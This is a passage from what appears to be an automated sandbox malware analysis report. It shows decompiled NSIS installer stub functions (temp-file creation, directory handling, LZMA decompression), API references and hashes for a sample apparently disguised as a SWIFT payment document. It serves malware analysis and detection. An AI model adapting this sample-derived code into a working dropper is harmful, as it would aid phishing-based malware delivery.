					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Strings

ebruary, xrefs: 004034D2, 0040356D

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: ebruary
API String ID: 1092082344-2749923991
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

nsa, xrefs: 00406194
C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\engineer\\AppData\\Local\\Temp\\nsj2F71.tmp\\", 7); // executed
				return _t4;
			}

0x00403c25
0x00403c34
0x00403c37
0x00403c39
0x00403c39
0x00403c40
0x00403c48
0x00403c4b
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c54
0x00403c60
0x00403c66

APIs

CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\, xrefs: 00403C5B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\
API String ID: 2962429428-1943657329
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8));
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1104044542
Opcode ID: 78b35cda00fef60e7fad3ee9365003173471bcb7d959d196d715232f24f54807
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 78b35cda00fef60e7fad3ee9365003173471bcb7d959d196d715232f24f54807
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040604b
0x00406056
0x0040605a
0x00406061
0x0040606d
0x0040607d
0x0040607f
0x00406097
0x00406098
0x0040609f
0x004060a0
0x00000000
0x00000000
0x00406083
0x0040608a
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x0040608a
0x004060a2
0x004060a8
0x00000000
0x004060b6
0x0040606f
0x00406075
0x00000000
0x00000000
0x00000000
0x00000000
0x00406075
0x0040605c
0x00000000

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560,00000000), ref: 00406098
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560), ref: 004060A8

Strings

P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
